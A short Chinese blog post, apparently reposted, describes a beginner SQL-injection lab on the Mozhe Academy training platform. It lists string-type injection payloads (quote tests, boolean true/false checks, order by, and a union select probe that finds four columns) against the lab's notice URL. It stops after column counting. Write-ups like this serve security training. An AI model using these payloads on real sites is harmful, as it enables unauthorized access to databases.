web安全(入门)墨者学院 SQL注入 字符型
1、打开网页,查看源码,发现停机公告那里有个url,尝试注入一下
2、?id=tingjigonggao'
发现有个函数不满足,会报错,不过既然告诉了是字符型注入,再试一下:
?id=tingjigonggao' and '1'='1
发现成功显示
?id=tingjigonggao' and '1'='2
显示有误
3、判断列数:
?id=' order by 1#
发现不行
使用?id=' union select 'null','null','null','null# 判断列数,发现有四列
..
转载
2020-08-28 18:39:14 ·
418 阅读 ·
1 评论